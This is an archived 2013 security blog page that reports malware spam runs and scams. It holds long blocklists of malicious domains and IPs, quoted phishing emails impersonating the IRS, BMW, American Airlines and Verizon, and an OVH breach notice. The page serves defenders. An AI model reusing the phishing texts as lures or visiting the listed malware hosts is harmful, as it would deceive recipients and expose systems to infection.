Sponsored by..

Tuesday, 23 July 2013

Something evil on 91.233.244.102

These following domains are hosted on 91.233.244.102 (Olborg Ltd, Russia). This IP is implicated in Runforestrun infectors, has several malware detections on VirusTotal plus a few on URLquery. Google has flagged several domains as being malicious (marked in red below).

Obviously there's quite a concentration of evil on this IP address and the simplest thing to do would be to banish it from your network, in fact I would personally recommend blocking the whole 91.233.244.0/23 block at least 91.233.244.96/28 (see why) . However, a (probably incomplete) list of suspect domains on this IP are as follows:


aabgxpqayus.com
adcjhjpalcljihgw.info
adwwlwgfgefmzcwg.info
aefbydtsxloe.org
anzku-bqe.net
aodpcm-foub.com
aodpcm-foubfkmp.info
aoflkpshxeoa.org
apsnxeyafofkqfql.ru
apvvkrodqlouyoso.ru
aydpgzxzyidbeqoq.ru
ayxksipvqfxvlfaq.ru
bhigmqckbqhleqlo.ru
cqfreoz-qwd.info
cqfreoz-qwdhmor.com
cuojshtbohnt.com
cuojshtbohnt.info
dfglsfvdyus.com
dgjrfwiwpgjrwdcg.info
dgmcaaliawgewghp.info
donotwantyou787.ru
dppukpdhxloa.org
drgsfp-irxei.com
dspukpshxeoa.org
dwofvs-jdoyhpe.in
eaxrm-xnesh.org
fafogzpvzbvorqkk.ru
fexwxvogrgvfqxzk.ru
feyvxryisqafrssy.ru
fiwiziccefirihhh.info
fjzgpahrgwrzcwle.info
ftiuhrc-tzgk.info
fwcfpfwggjgmfwhw.info
fwdgffzethwhgffp.info
fyqhxu-lfq.in
gffqihioodwfteii.info
ggprgzwfapwdwold.info
gooogleadsense.org
hccakpdhxloa.org
hcnvidjkpytou.com
hhmsobscuoxgqwkhtugpnr.com
hivqwbnkasisil.com
hmcakpshxeoa.org
igicpiipggljcwaf.info
ihwwwhwipfarwrtf.info
ijxsncuprepwqzlt.ru
iprdjrhfporqpgcg.info
ipwfwtdwgiwwehie.info
jdiiffgfgg.com
jecvydtsxloe.org
jeuvkpdhxloa.org
jyuvkpshxeoa.org
kdvmczv-k.in
kkagkpshxeoa.org
kkyqexfzsqzysrkl.ru
knuidyekzkyuhtpi.ru
kxpgydtsxloe.org
kynzmwh-y.info
kynzmwh-yelpu.com
lalcjrdwrqwgwerf.info
ljfwwtftwgiltwwp.info
ljhfhwgiwiwhpwrf.info
lomxtgmgrswlgrrn.ru
mapbo-jra.com
mapbo-jragnrw.info
mfgqnlbmyus.com
mpmeezpmowrgihzc.info
nealkpdhxloa.org
newlydtsxloe.org
nsjosicxuhpidhlp.ru
nwalkpshxeoa.org
ocunydtsxloe.org
ocurkpdhxloa.org
odzbgxfiipvkrqfa.ru
oghwrfhoyus.com
oiicmtkpkaocnm.com
peawrwfgtewchzjc.info
peijgfhwhoffgorf.info
powwrwllojfjgrfg.info
pqueaafqaeoqrqxq.ru
psknwsqsqognrpoo.ru
qablspvqyus.com
qflqqfqqwzazqzrw.ru
qqzewquorqiuqviv.ru
r5z7yy68.com
rfffnahfiywyd.com
rfffnahfiywyd.info
rgdgkpshxeoa.org
rpdgkpdhxloa.org
rpdtydtsxloe.org
rrilffoowjcrqpdw.info
rrrmpfqrgfgfmthj.info
rseibvaoopvkvxyp.ru
sdfsfjkhewsdfe.com
sodsvsyxfzelkknq.ru
soopqzxleaqlqqfi.ru
sownoyqkaqxpqqkp.ru
thwiv-qyhnuydf.info
twctqwaggdwfwhzd.info
uivh-cltqmhb.org
uquqlyyuivkogxyr.ru
vbkfrqqfovaqyeio.ru
viqtkpshxeoa.org
vjykxh-ajp.info
vjykxh-ajpwafh.com
vogxnkg-vgqz.in
vpftydtsxloe.org
vvteeuevhpbpepfi.ru
vxvhwcixcxqxd.com
walfyqoslwfzgxxf.ru
wcrcwwzwercejjjp.info
wfcwhhrfoacawllf.info
wfigeegwffwgoffj.info
wgfdwfhejieeppeo.info
wiafokpwyus.com
wqllweihhwawzctg.info
wwfcfpmfwpompwow.info
xlamzju-lr.com
xlamzju-lrychj.info
xloeydtsxloe.org
xwaqllqvdovqikyn.ru
xweexxdyiaoaskfy.ru
yalkzsvudybexfgd.ru
yirxzxffiedeqddo.ru
ylaqdsoorlrrfyke.ru
ylbaugjnfutivfupbojcybabmrax.com
ypfuidx-i.com
yqgeqwxyfqowoiko.ru
yrjaq-jeyjtckzn.in
zkafwwiilgszbeps.ru
zkzuqobzowqyuixg.ru
zvswwossogquwrfs.ru
zyvskwylixxfswkq.ru

Malware sites to block 23/7/13

These malicious domains and IPs are associated with this prolific gang.  As usual, I've listed IPs with hosts first and then a plain list of IPs and domains for copy-and-pasting at the end.

5.175.191.106 (GHOSTnet, Germany)
24.173.170.230 (Time Warner Cable, US)
31.145.19.17 (Borusan Telekom / Ericsson-NET, Turkey)
41.196.17.252 (Link Egypt, Egypt)
46.246.41.68 (Portlane Networks, Sweden)
46.45.182.27 (Radore Veri Merkezi Hizmetleri, Turkey)
50.97.253.162 (Softlayer, US)
54.225.124.116 (Amazon AWS, US)
59.77.36.225 (CERNET, China)
59.124.33.215 (Chungwa Telecom, Taiwan)
59.126.142.186 (Chungwa Telecom, Taiwan)
59.160.69.74 (TATA Communications, India)
61.28.143.133 (ETPI, Philippines)
62.76.44.105 (IT House / Clodo-Cloud, Russia)
69.60.115.92 (Colopronto, US)
74.62.189.22 (Time Warner Cable, US)
74.93.56.83 (Comcast, US)
74.208.246.145 (1&1, US)
85.17.224.131 (Leaseweb, Netherlands)
85.119.187.145 (UniWeb, Belgium)
88.86.100.2 (Supernetwork / Castlegem, Czech Republic)
88.150.191.194 (Redstation, UK)
95.87.1.19 (Trakia Kabel OOD, Bulgaria)
95.111.32.249 (Mobitel EAD, Bulgaria)
108.170.32.179 (Secured Servers, US)
108.179.8.103 (Tyco / Cablevision, US)
109.123.125.68 (UK2.net, UK)
114.112.172.34 (Worldcom Teda Networks Technology, China)
119.92.209.120 (Makati  IPG, Philippines)
120.124.132.123 (TANET, Taiwan)
121.83.197.179 (K-Opticom Corporation, Japan)
128.252.158.57 (Washington University, US)
138.80.14.27 (Charles Darwin University, Australia)
140.120.113.18 (TANET, Taiwan)
162.209.80.221 (Rackspace, US)
165.225.149.235 (Joyent, US)
166.78.183.28 (Rackspace, US)
172.245.16.47 (New Wave NetConnect / ColoCrossing, US)
172.255.106.126 (Nobis Technology Group, US)
182.72.216.173 (CusDelight Consultancy Services, India)
188.40.92.12 (Hetzner, Germany)
188.132.213.115 (Mars Global Datacenter Services, Turkey)
188.134.26.172 (Perspectiva Ltd, Russia)
189.15.96.61 (Companhia De Telecomunicacoes Do Brasil Central , Brazil)
190.85.249.159 (Telmex Colombia, Colombia)
190.238.107.240 (Telefonica del Peru, Peru)
192.95.54.119 (OVH, Canada)
192.241.205.26 (Digital Ocean, US)
195.225.58.122 (C&A Connect SRL, Romania)
198.61.213.12 (Rackspace, US)
198.98.102.165 (Enzu, US)
198.175.124.17 (DNSSLAVE.COM, US)
202.197.127.42 (Hunan Normal University, China)
203.236.232.42 (KINX, Korea)
208.69.42.50 (Bay Area Video Coalition, US)
208.115.114.68 (WOWRACK, US)
209.222.67.251 (Razor Inc, US)
210.200.0.95 (Asia Pacific On-line Services, Taiwan)
211.224.204.141 (KINX, Korea)
212.143.233.159 (013 Netvision Network, Israel)
217.64.107.108 (Society Of Mali's Telecommunications , Mali)

5.175.191.106
24.173.170.230
31.145.19.17
41.196.17.252
46.246.41.68
46.45.182.27
50.97.253.162
54.225.124.116
59.77.36.225
59.124.33.215
59.126.142.186
59.160.69.74
61.28.143.133
62.76.44.105
69.60.115.92
74.62.189.22
74.93.56.83
74.208.246.145
85.17.224.131
85.119.187.145
88.86.100.2
88.150.191.194
95.87.1.19
95.111.32.249
108.170.32.179
108.179.8.103
109.123.125.68
114.112.172.34
119.92.209.120
120.124.132.123
121.83.197.179
128.252.158.57
138.80.14.27
140.120.113.18
162.209.80.221
165.225.149.235
166.78.183.28
172.245.16.47
172.255.106.126
182.72.216.173
188.40.92.12
188.132.213.115
188.134.26.172
189.15.96.61
190.85.249.159
190.238.107.240
192.95.54.119
192.241.205.26
195.225.58.122
198.61.213.12
198.98.102.165
198.175.124.17
202.197.127.42
203.236.232.42
208.69.42.50
208.115.114.68
209.222.67.251
210.200.0.95
211.224.204.141
212.143.233.159
217.64.107.108
aa.com.reservation.viewfareruledetailsaccess.do.sai-uka-sai.com
abundanceguys.net
allgstat.ru
amimeseason.net
annot.pl
antidoctorpj.com
aqua-thermos.com
astarts.ru
auditbodies.net
aurakeep.net
autocompletiondel.net
autorize.net.models-and-kits.net
badstylecorps.com
basedbreakpark.su
beachfiretald.com
bebomsn.net
biati.net
blacklistsvignet.pl
blackragnarok.net
blindsay-law.net
bnamecorni.com
boats-sale.net
brasilmatics.net
buffalonyroofers.net
businessdocu.net
buty24-cool.com
buycushion.net
cbstechcorp.net
centow.ru
chairsantique.net
ciriengrozniyivdd.ru
cirormdnivneinted40.ru
clik-kids.com
condaleunvjdlp55.net
condalinarad72234652.ru
condalinaradushko5.ru
condalininneuwu36.net
condalinneuwu37.net
condalinneuwu5.ru
condalnua745746.ru
cooldeaflympics.com
cpa.state.tx.us.tax-returns.mattwaltererie.net
crossplatformcons.com
cryoroyal.net
datapadsinthi.net
doorandstoned.com
driversupdate.pw
dulethcentury.net
e-citystores.net
e-eleves.net
ehchernomorskihu.ru
ehnaisnwhgiuh29.net
ehnihenransivuennd.net
ehnihjrkenpj.ru
ehnihujasebejav15.ru
eliroots.ru
epackage.ups.com.shanghaiherald.net
ergopets.com
erminwanbuernantion20.net
ermitirationifyouwau30.net
estateandpropertty.com
etiquetteinsp.net
fastfragcheck.com
feminineperceiv.pl
fenvid.com
filmstripstyl.com
firefoxupd.pw
firerice.com
flashedglobetrot.pl
foremostorgand.su
foremostorgand.suc
fulty.net
gamnnbienwndd70.net
gcoordinatind.com
gebelikokulu.net
generationpasswaua40.net
genie-enterprises.com
germany.no-ip.biz
ghroumingoviede.ru
gnanosnugivnehu.ru
gondamtvibnejnepl.net
goodread.pl
greenleaf-investment.net
gromovieotvodidiejj40.net
handwrittenma.com
hdmltextvoice.net
heavygear.net
heidipinks.com
hemorelief.net
hiddenhacks.com
highsecure155.com
hingpressplay.net
homesforsaleftwaltonbea.com
hotkoyou.net
hotpubblici.com
housesales.pl
iberiti.com
icensol.net
independinsy.net
info-for-health.net
insectiore.net
irs.gov.tax-refunds.ach.treehouse-dreams.net
jonkrut.ru
kistrotilewest.su
klermont.net
klwines.com.order.complete.prysmm.net
kubiwaya.net
ledfordlawoffice.net
letsgofit.net
linguaape.net
linkedin.com-update-report.taltondark.net
links.emails.bmwusa.com.open.pagebuoy.net
locavoresfood.net
mackay-revealed.net
made-bali.net
magiklovsterd.net
marriott.com.reservation.lookup.motobrio.net
marriott.com.reservation.lookup.viperlair.net
metalcrew.net
microsoftnotification.net
mifiesta.ru
modshows.net
momotlawfirm.net
morphed.ru
mosher.pl
motobrio.net
mycanoweb.com
myfreecamgirls.net
mywebsitetips.net
neplohsec.com
nipslippage.net
nvufvwieg.com
onemessage.verizonwireless.com.verizonwirelessreports.com
ontria.ru
organizerrescui.pl
outbounduk.net
oydahrenlitu346357.ru
package.ups.com.shanghaiherald.net
pagebuoy.net
pass-hc.com
peertag.com
playtimepixelating.su
pool-inter.com
porschetr-ml.com
potteryconvention.ru
privat-tor-service.com
prothericsplk.com
prysmm.net
quipbox.com
ratenames.net
relectsdispla.net
rentipod.ru
restless.su
saberig.net
safebrowse.pw
sai-uka-sai.com
sartorilaw.net
scourswarriors.su
secureaction120.com
securednshooki.com
sendkick.com
sensetegej100.com
seodirect-proxy.com
shanghaiherald.net
sludgekeychai.net
soberimages.com
susubaby.net
tagcentriccent.net
tagcentriccent.pl
tax-returns.gov.cpa.state.us.gebelikokulu.net
teakfromafrica.net
techno5room.ru
thegalaxyatwork.com
thosetemperat.net
tor-connect-secure.com
treehouse-dreams.net
tvblips.net
twitter.com.greenleaf-investment.net
u-janusa.net
ukbash.ru
usergateproxy.net
verizonwirelessreports.com
viperlair.net
vip-proxy-to-tor.com
vitans.net
vivendacalangute.net
wic-office.com
wordstudio.pl
wow-included.com
zestrecommend.com

Monday, 22 July 2013

IRS.gov "Complaint Case #488870383295" spam / Complaint_488870383295.zip

This spam contains a malicious attachment, but seems to confuse the roles of the BBB and the IRS.

Date:      Mon, 22 Jul 2013 09:59:08 -0500 [10:59:08 EDT]
From:      "IRS.gov" [fraud.dep@irs.gov]
Subject:      Complaint Case #488870383295

You have received a complaint in regards to your business services.
The complaint was filled by Mr./Mrs. Ulivo DELERME on 07/22/2013/

Case Number: 488870383295

Instructions on how to resolve this complaint as well as a copy of the original complaint are attached to this email.

Disputes involving consumer products and/or services may be arbitrated. Unless they directly relate to the contract that is the basis of this dispute, the following claims will be considered for arbitration only if all parties agree in writing that the arbitrator may consider them: Claims based on product liability; Claims for personal injuries; Claims that have been resolved by a previous court action, arbitration, or written agreement between the parties.

The decision as to whether your dispute or any part of it can be arbitrated rests solely with the IRS.

The IRS offers a binding arbitration service for disputes involving marketplace transactions. Arbitration is a convenient, civilized way to settle disputes quickly and fairly, without the costs associated with other legal options.

2013 Council of IRS, Inc. All Rights Reserved.

Attached to the email is a ZIP file Complaint_488870383295.zip which in turn contains an executable Complaint_07222013.exe which is bad news. VirusTotal detection rates are a so-so 14/47.

ThreatExpert and Comodo CAMAS give a little background information, but in this case the Malwr analysis seems to be the most comprehensive and shows traffic out the the following compromised sites:

prospexleads.com
phonebillssuck.com
moneyinmarketing.com
abbeyevents.co.uk
salsaconfuego.com
fales.info

The second part has a much lower detection rate of just 2/47. At the moment this second stage is still being analysed.


BMW spam / pagebuoy.net

This convincing looking BMW spam leads to malware on

Date:      Mon, 22 Jul 2013 13:07:50 -0500 [14:07:50 EDT]
From:      BMW of North America [womanliere75@postmaster.aa-mail.org]
Reply-To:      motherfuckinge926@m.aa-mail.com
Subject:      The BMW 6-Series M Sport Edition, M Universe, and more.


BMW’s 6-Series M Sport Edition     View Online
BMW
A 6 SERIES.
WITH M PANACHE.
Meet the 6-Series M Sport Edition. Available in all 6 series models, the M Sport Edition boasts premium features like M Aerodynamics, LED Adaptive Headlights, an M leather steering wheel, and Nappa Leather sport seats for a ride that’s a 6-Series inside and out.
LEARN MORE
Efficient Dynamics
   
Table of Contents


» BMW M Universe
» BMW Wins Again
» BMW i3 Design
» BMW Superbike
» BMW Collections

    WELCOME TO M’S
NEW HOME.

In the M Universe, your own M photos will become part of a visual timeline spanning all 40 award-winning years of the iconic M brand, from the classic 1972 to the new M6 Gran Coupe. To all you M fans, welcome home.

» ENTER BMW M UNIVERSE

    THE 3 SERIES WINS AGAIN

The BMW 3 Series continues to live up to its hard-earned reputation as the best compact sports sedan in the world. AUTOMOBILE MAGAZINE presented the 3 Series with the coveted 2013 All-Star award, making the number of AUTOMOBILE MAGAZINE awards won by the 3 Series alone over a dozen.

» BUILD YOUR OWN

    LIGHTWEIGHT, AGILE, AND STRONG

The Life Module of BMW i vehicles is a high–strength and lightweight passenger compartment made from carbon fiber reinforced plastic (CFRP). This, along with the use of aluminum, offsets the additional weight of the batteries of an electric car. And by reducing the weight, the number of batteries and the average battery charging time can also be reduced.

» LEARN MORE

    WORLD SUPERBIKE CHAMPIONSHIP UPDATE

Midway through an already successful season, the BMW Motorrad Goldbet SBK Team is getting ready for their next race in Imola, Italy. The team is coming off an impressive first-place finish by rider Marco Melandri in Portimão. Keep up with the latest news and updates from the team on the BMW Motorrad USA Facebook page.

» STAY CONNECTED

    2013 SPORT COLLECTIONS

BMW presents all-new sport collections. Apparel and accessories made from advanced materials with innovative designs so you can perform and look your best.

» LEARN MORE

EXPLORE THE BMW LINEUP
                         
                         



» Lease + Finance Offers    
» Build Your Own

» Test Drive    
» BMW Ultimate Service®

GET THE LATEST
BMW NEWS + UPDATES                

Don’t forget to add bmwusa@emails.bmwusa.com to your Address Book to keep it from skipping your inbox or getting caught in spam filters.
ff
We want your experience with the BMW website to be as smooth and reassuring as driving a BMW. Accordingly, we diligently safeguard your privacy. If you wish to review our Privacy Policy at any time, please click on the link below, or copy and paste it into your Web browser’s location window. http://www.bmwusa.com/about/privacy.html

We’d like to keep you up-to-date on the latest BMW products, news and events via email. If, however, you’d like to stop receiving them, you can unsubscribe at any time.

Please note that we are located at 300 Chestnut Ridge Road, Woodcliff Lake, NJ 07677. ©2013 BMW of North America, LLC. The BMW name, model names and logo are registered trademarks. For more information call 1-800-831-1117 or go to www.bmwusa.com.

The link in the email goes through a legitimate hacked site and ends up on [donotclick]links.emails.bmwusa.com.open.pagebuoy.net/news/bmw-newmodel.php (report here) which is hosted on the same IP addresses as this spam run.

American Airlines spam / sai-uka-sai.com

This fake American Airlines spam leads to malware on www.aa.com.reservation.viewFareRuleDetailsAccess.do.sai-uka-sai.com:

From:     American.Airlines@aa.net
Date:     22 July 2013 17:22
Subject:     AA.com Itinerary Summary On Hold

Dear customer,

Thank you for making your travel arrangements on AA.com! Your requested itinerary is now ON HOLD. Details below.

To ensure that your reservation is not canceled you must complete the purchase of this reservation by clicking the “Purchase” button on this email, or by using the “View/Change Reservations” section on www.aa.com.

left corners         left corners

 

This reservation is on HOLD until July 22, 2013 11:59 PM CDT (Central Daylight Time) .

Record Locator: LEBBGM             Purchase

 

left corners         left corners

Passengers

   Isabella  Green
NOTE: This is not a ticket or electronic receipt
Carrier Flight
Number
Departing Arriving Cabin

Booking Code
Seats Meals
City Date & Time City Date & Time

AMERICAN AIRLINES OPERATED BY AMERICAN EAGLE AIRLINES
2879 SPS Wichita Falls July 24, 2013 10:50 AM DFW Dallas/ Fort Worth July 24, 2013 11:43 AM Economy

M
32A  Food For Purchase 

AMERICAN AIRLINES
1795 DFW Dallas/ Fort Worth July 24, 2013 12:35 PM IAH Houston July 24, 2013 01:43 PM Economy

M
23A 

AMERICAN AIRLINES
1690 IAH Houston July 26, 2013 02:20 PM DFW Dallas/ Fort Worth July 26, 2013 03:35 PM Economy

M
20C 

AMERICAN AIRLINES OPERATED BY AMERICAN EAGLE AIRLINES
3294 DFW Dallas/ Fort Worth July 26, 2013 04:20 PM SPS Wichita Falls July 26, 2013 05:10 PM Economy

M
27B  Food For Purchase 
spacer
  Fare Summary help
Average Fare per Person - 444.00 USD
Passenger Type Used in Pricing Fare per Person Additional Taxes and Fees per Person Total Price
1  Adult 442.90 USD 34.25 USD 490.95 USD
Total Price 495.49 USD
spacer
  Merchandising Summary help
Flight Number Seat Number Seat Price Taxes Total Price
2879 0.00 USD 0.00 USD 0.00 USD
1795 14.00 USD 1.05 USD 15.05 USD
1690 14.00 USD 1.05 USD 15.05 USD
3294 0.00 USD 0.00 USD 0.00 USD
Total Price 30.10 USD
  Purchase
Please note the following:
 • View Fare rules.
 • Fares are only guaranteed up to 24 hours.
 • Additional foreign taxes may apply.
 • Additional fees may also apply for tickets not purchased through AA.com.


This is not the itinerary receipt that is required for identification purposes at the airport check-in. That receipt will be furnished upon purchase of this reservation.

In order to proceed to your gate you must present a government issued photo I.D. and either your boarding pass or a priority verification card at the screening security checkpoint.

If you are not a resident of the U.S., U.K., Canada or select countries in Latin America and the Caribbean, tickets must be purchased at an American Airlines ticketing location/airport, or by calling an American Airlines International Reservations office. Flights booked on carriers other than American Airlines, American Eagle® or AmericanConnection® are on a request basis only.

You've got payment options at AA.com! Make your dream vacation come true with the Fly Now Payment Plan, speed through checkout with PayPal, or use electronic checks to pay directly from your checking account. You can also pay in cash at participating Western Union locations or use a credit/debit card. Available payment options may vary by country.

The link in the email goes through a legitimate hacked site and ends up on a malware landing page at [donotclick]www.aa.com.reservation.viewFareRuleDetailsAccess.do.sai-uka-sai.com/news/american-airlines-hold.php (report here) hosted on the following IPs:


50.97.253.162 (Softlayer, US)
95.111.32.249 (Megalan / Mobitel EAD, Bulgaria)
188.134.26.172 (Perspectiva Ltd, Russia)
209.222.67.251 (Razor Inc, US)

The WHOIS details for that domain are the characteristically fake ones associated with this gang:
        Michael Fenwick freehotjob@yahoo.com
        21 Fredricksburg Court
        State College
        PA
        16803
        US
        Phone: +1.8144411445




Recommended blocklist:
50.97.253.162
95.111.32.249
188.134.26.172
209.222.67.251
aa.com.reservation.viewfareruledetailsaccess.do.sai-uka-sai.com
allgstat.ru
autorize.net.models-and-kits.net
ciriengrozniyivdd.ru
cirormdnivneinted40.ru
clik-kids.com
condalnua745746.ru
cpa.state.tx.us.tax-returns.mattwaltererie.net
driversupdate.pw
ehchernomorskihu.ru
ehnaisnwhgiuh29.net
ehnihenransivuennd.net
ehnihujasebejav15.ru
eliroots.ru
epackage.ups.com.shanghaiherald.net
ergopets.com
erminwanbuernantion20.net
ermitirationifyouwau30.net
estateandpropertty.com
firefoxupd.pw
firerice.com
fulty.net
gamnnbienwndd70.net
gebelikokulu.net
generationpasswaua40.net
gnanosnugivnehu.ru
gondamtvibnejnepl.net
greenleaf-investment.net
housesales.pl
irs.gov.tax-refunds.ach.treehouse-dreams.net
klwines.com.order.complete.prysmm.net
linkedin.com-update-report.taltondark.net
marriott.com.reservation.lookup.motobrio.net
marriott.com.reservation.lookup.viperlair.net
microsoftnotification.net
mifiesta.ru
motobrio.net
mycanoweb.com
onemessage.verizonwireless.com.verizonwirelessreports.com
package.ups.com.shanghaiherald.net
pagebuoy.net
pass-hc.com
privat-tor-service.com
prysmm.net
quipbox.com
rentipod.ru
safebrowse.pw
sai-uka-sai.com
sartorilaw.net
sendkick.com
shanghaiherald.net
taltondark.net
tax-returns.gov.cpa.state.us.gebelikokulu.net
tor-connect-secure.com
treehouse-dreams.net
tvblips.net
twitter.com.greenleaf-investment.net
verizonwirelessreports.com
viperlair.net
vip-proxy-to-tor.com
vitans.net

OVH Hacked

A bad thing to happen, but kudos to OVH for being transparent about this issue:

Hello,

A few days ago, we discovered that the security of our internal network at our offices in Roubaix had been compromised. After internal investigations, it appeared that a hacker was able to obtain access to an email account of one of our system administrators. With this email access, they was able to gain access to the internal VPN of another employee. Then with this VPN access, they was able to compromise the access of one of the system administrators who handles the the internal backoffice.

Until then, internal security was based on 2 levels of verification:
- Geographical: required to be in the office or to use the VPN, i.e.: the IP source
- Personal: password

Measures taken following this incident
---------------------------------------

Immediately following this hack, we changed the internal security rules:
- Passwords of all employees were regenerated for all types of access.
- We set up a new VPN in a secure PCI-DSS room with highly restricted access
- Consulting internal emails is now only possible from the office / VPN
- All those who have critical access now have 3 verification levels:
- Ip source
- Password
- Staff's USB security token (YubiKey)


Findings
-------

After our internal investigation, we assume that the hacker exploited the access to achieve two objectives:
- Recover the database of our customers in Europe
- Gain access to the installation server system in Canada

The European customer database includes personal customer information such as: surname, first name, nic, address, city, country, telephone, fax and encrypted password.
The encryption password is "Salted" and based on SHA-512, to avoid brute-force attacks. It takes a lot of technical means to find the word password clearly. But it is possible. This is why we advise you to change the password for your user name. An email will be sent today to all our customers explaining these security measures and inviting them to change their password.
No credit card information is stored at OVH. Credit card information was not viewed or copied.

As for the server delivery system in Canada, the risk we have identified is that if the client had not withdrawn our SSH key from the server, the hacker could connect from your system and retrieve the password stored in the .p file. The SSH key is not usable from another server, only from our backoffice in Canada . Therefore, where the client has not removed our SSH key and has not changed their root password, we immediately changed the password of the servers in the BHS DC to eliminate an risk there. An email will be sent today with the new password. The SSH key will be systematically deleted at the end of the server delivery process in both Canada and Europe. If the client needs OVH for support, a new SSH key will need to be reinstalled.

Overall, in the coming months the back office will be under PCI-DSS which will allow us to ensure that the incident related to a specific hack on specific individuals will have no impact on our databases. In short, we were not paranoid enough so now we're switching to a higher level of paranoia. The aim is to guarantee and protect your data in the case of industrial espionage that would target people working at OVH.

We also filed a criminal complaint about this to the judicial authorities. In order not to disrupt the work of investigators, we will not give other details before the final conclusions.

Please accept our sincere apologies for this incident. Thank you for your understanding.

Regards,

Octave 


ygregistryltd.net / "Huasheng Ltd" domain scam

This is the same scam as this, this and this. Avoid.

From:     Jim Wang [jim.wang@ygregistryltd.net]
Date:     22 July 2013 15:29
Subject:     Regarding Asia/Cn/Hk domain name & Internet Keyword

Dear Manager,

(If you are not the person who is in charge of this, please forward this to your CEO,Thanks)

This email is from China domain name registration center, which mainly deal with the domain name registration in China and Asia. We received an application from Huasheng Ltd on July 22, 2013. They want to register " [redacted] " as their internet keyword and China/Asia/Hongkong (CN/ASIA/HK) domain names. But after checking it, we find this name conflicts with your company. In order to deal with this matter better, so we send you email and confirm whether this company is your distributor or business partner in China or not?

Best Regards,

Jim
General Manager
Shanghai Office (Head Office)
3002, Nanhai Building, No. 854 Nandan Road,
Xuhui District, Shanghai 200070, China
Tel: +86 216191 8696
Mobile: +86 1870199 4951
Fax: +86 216191 8697
Web: www.ygregistryltd.net

Note, all these domains are on the same server and can be considered scammy:
ygregistryltd.com
yg-registry.cn
ygregistry.cn
ygregistryltd.net

David Cameron's porn block - how will it work?

This government likes its half-baked ideas, and David Cameron's attempt to bring in mandatory porn blocking in the UK seems to be one of those daft ideas. Yes, ISPs should offer blocking if people want it.. and perhaps they should be made to offer it by law. But there are a number of concerns which are well addressed by this New Statesman article.

Leaving aside the moral debate and the questions over who decides what, there is the tricky question of how ISPs would actually block access to porn.

DNS filtering

The simplest and quickest way to block it is to use DNS filtering. ISPs can simply set their DNS servers to not resolve adult sites. You can do this sort of thing with OpenDNS already. The advantages is that this is fairly easy to implement and it doesn't cause any latency in web traffic. The disadvantage from the point of view of censoring is that it is trivially easy to bypass, simpy change your DNS provider to one that doesn't block sites or access the porn sites through their IP address only where they  have dedicated servers (most big sites do).

Of course, if people bypass the DNS filtering by using non-ISP DNS filters, ISPs could then firewall all outbound DNS requests. But that would interfere with people's freedom to use Google or OpenDNS or other DNS providers if they want.

Deep Packet Inspection

A more sophisticated approach is to inspect every packet and determine where it is going. This should block sites even if the customer has chosen different DNS settings, and it can pick up and negate a lot of common attempts to bypass filters. But this sort of thing is slow and expensive, ISPs would need to pass on the costs to consumers and the added latency of filtering would make web surfing slower. Many businesses use a form of this to protect their corporate network already, but they are prepared to put up with the downsides for the additional protection.

You could still use a proxy, VPN or Tor to get around it. And HTTPS screws some elements of DPI because it is encrypted, there are ways around that but they are extremely messy and had many drawbacks.

And of course there's the privacy issue. If ISPs are slurping all your data to this level then who has access to it? Supporters of DPI may we have a hidden agenda.

IP address blocking

Instead of blocking domains, IP addresses hosting pornography can be blocked. That's a pretty quick and easy solution too, but it means that anything on shared hosting with "adult" content could lead to every other site on that IP being blocked too.. There would be a lot of legitimate sites blocked as a result.


Anti-circumvention

ISPs could use a combination of the above to stop traffic. But it is relatively easy to use a proxy or VPN connection, but the next logical step would be to go to war with providers of these services too. It is very difficult to stop people finding ways around blocks. And remember, we're not talking about illegal material here.. we're talking about perfectly legal material which is blocked by default.

So, in my opinion this approach will have the drawbacks of being a combination of ineffective, expensive and slow. More needs to be done to protect children from accidentally accessing material that they shouldn't have access to (and please could we include malware with that?), but this half-baked approach has the potential to be an expensive fiasco.

Saturday, 20 July 2013

Verizon Wireless "Data Usage Overage Alert" / verizonwirelessreports.com

This fake Verizon email leads to malware on the domain onemessage.verizonwireless.com.verizonwirelessreports.com:

Date:      Fri, 19 Jul 2013 10:48:31 -0500 [11:48:31 EDT]
From:      Verizon Wireless [VZWMail@e-marketing.verizonwireless-mail.net]
Subject:      Data Usage Overage Alert

Important Information About Your Account.      View Online
verizon wireless    Explore    Shop    My Verizon    Support   
                                       
Important Information About Your Data Usage

Your account has used your data allowance for this month and you may now be billed overage charges. Your monthly data allowance will reset on the 20th.

Run an Account Analysis in My Verizon to analyze your recent months' data usage and review your plan options.

Don't forget, you can also manage your alert settings in My Verizon including adding recipients and opting out of specific alerts.
Thank you for choosing Verizon Wireless.
   
Details as of:
[redacted]

07/19/2013 02:15 AM EDT
   
                                       
We respect your privacy. Please review our privacy policy for more information
about click activity with Verizon Wireless and links included in this email.

This email was sent to [redacted];

ID: [redacted]

The link in the email goes through a legitimate hacked site and ends up on a malware landing page at [donotclick]onemessage.verizonwireless.com.verizonwirelessreports.com/news/verizon-bill.php (report here) hosted on:

172.255.106.126 (Nobis Technology Group, US / Creative Factory Beijing, China)
188.134.26.172 (Perspectiva Ltd, Russia)

The domain verizonwirelessreports.com is fake and was recently registered to an anonymous person. However, given the IPs and associated domains then this is clearly the work of this gang
.
Blocklist:
172.255.106.126
188.134.26.172
verizonwirelessreports.com
firerice.com
onemessage.verizonwireless.com.verizonwirelessreports.com
package.ups.com.shanghaiherald.net
epackage.ups.com.shanghaiherald.net
vitans.net
www.klwines.com.order.complete.prysmm.net
prysmm.net
shanghaiherald.net



Friday, 19 July 2013

whoswhonetworkonline.com spam

This turd of an email was sent to an info@ email address on a domain I own. It appears to be a classic Who's Who scam.

From:     Who's Who [cpm2@contactwhoswho.us]
Reply-To:     databaseemailergroup@gmail.com
date:     19 July 2013 05:44
subject:     You were recently nominated into Who's Who Amoung Executives

Who's Who Network Online

Hello,

As you are probably aware, in the last few weeks, we at the Who's Who Among Executives and Proefssionals have reached out to several hundred individuals for placement in our upcoming 2013 edition of our directory.  You were contacted, but we did not receive any of your biographical information.  We would like to give you another opportunity to do so.

The publication's editors are now assembling the biographical profiles of today's leaders from the business world into one comprehensive source. Thousands of researchers at medical, academic, public and corporate libraries, as well as journalists and media professionals, rely upon the academic registry as a daily reference tool for obtaining information about the world's most experienced men and women at the C-Level in the private and public sectors. Inclusion in the publication is considered by many as a signal mark of achievement.

To be included in this prestigious publication, you need only provide the requested information by completing our online biographical data form. Please Click Here to fill out your form.

The information you provide will be evaluated according to the selection standards that the NAPN have developed over many years as the world's premier biographical compiler. If your data passes our initial screening, we will prepare your biography and send you a pre-publication proof for your verification and approval.

I congratulate you on the achievements that have brought your name to the attention of our editorial committee. We look forward to hearing from you.

